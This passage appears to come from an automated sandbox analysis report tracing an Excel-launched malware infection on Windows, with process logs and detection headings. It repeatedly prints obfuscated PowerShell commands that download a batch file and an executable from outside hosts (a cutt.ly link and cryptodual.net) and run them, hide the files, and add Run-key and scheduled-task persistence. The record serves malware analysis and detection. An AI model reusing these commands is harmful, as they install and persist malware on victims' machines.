            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............t.i.m.e.o.u.t...}..v....................................N.......................x.$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.......t.........................$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>.....................................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. .................................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................._>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^>..... ./.t. ..........DB.............X.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........d1......................:_>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................^>.....r.e.g............DB.....................T.......................
            Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................Y>........J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ......................................Y>........J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: .................................................DB.....................*Y>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................................`{.J....................J^>......$.J..............B...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...1.". ............Y>.....i.f. ............DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................DB.............................................d1......h..v......$........................J....
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.m.d...........................................(................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................X>.....C.m.d............DB.....................t.......................
            Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ..............DB......................Y>......................DB...............$.............................
            Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......$.....`.$.....8.$.....B.......................
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................0.......................(.P.....................$.......R.................................................................2.....
            Source: C:\Windows\SysWOW64\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........%.....N....... .%.......%.....
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................t...........E.R.R.O.R.:. ...................8...............................................................................
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................t...........E.R.R.O.(.P.....................8.......................................................j.......x...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\ps.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Roaming\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: unknownProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
            Source: unknownProcess created: C:\Windows\System32\mode.com mode 18,1
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
            Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\ps.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2120349465.0000000002B70000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2139019469.0000000002B80000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2116599990.0000000002AD0000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: ps.exe.23.dr, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: GvthaHtVzpRh.exe.24.dr, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 24.2.ps.exe.e70000.2.unpack, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 24.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: svchost.exe.27.dr, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 27.2.ps.exe.e70000.1.unpack, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 27.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 32.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 32.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 35.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 35.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Obfuscated command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FF002606FD pushad ; ret
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00E7B93E push es; ret
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_0029887D push esp; retf
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00296AB5 push esp; retf
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_002994C1 push esp; retf
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00297F27 push esp; ret
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00297F58 pushad ; ret
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_004A721B push ecx; retf
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00AF11AA push cs; retf
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00480FEB push eax; mov dword ptr [esp], 00401500h
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00480FEB push edx; mov dword ptr [esp], 0040150Eh
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_0041E390 push eax; mov dword ptr [esp], esi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_0041E560 push edx; mov dword ptr [esp], ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_004019C9 push edx; mov dword ptr [esp], eax
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_004019C9 push ecx; mov dword ptr [esp], eax
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00401D0B push eax; mov dword ptr [esp], esi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00401ED2 push edx; mov dword ptr [esp], 00000064h
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00401ED2 push ecx; mov dword ptr [esp], edi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00401ED2 push edi; mov dword ptr [esp], 00000064h
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00E7B93E push es; ret
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_0023B93E push es; ret
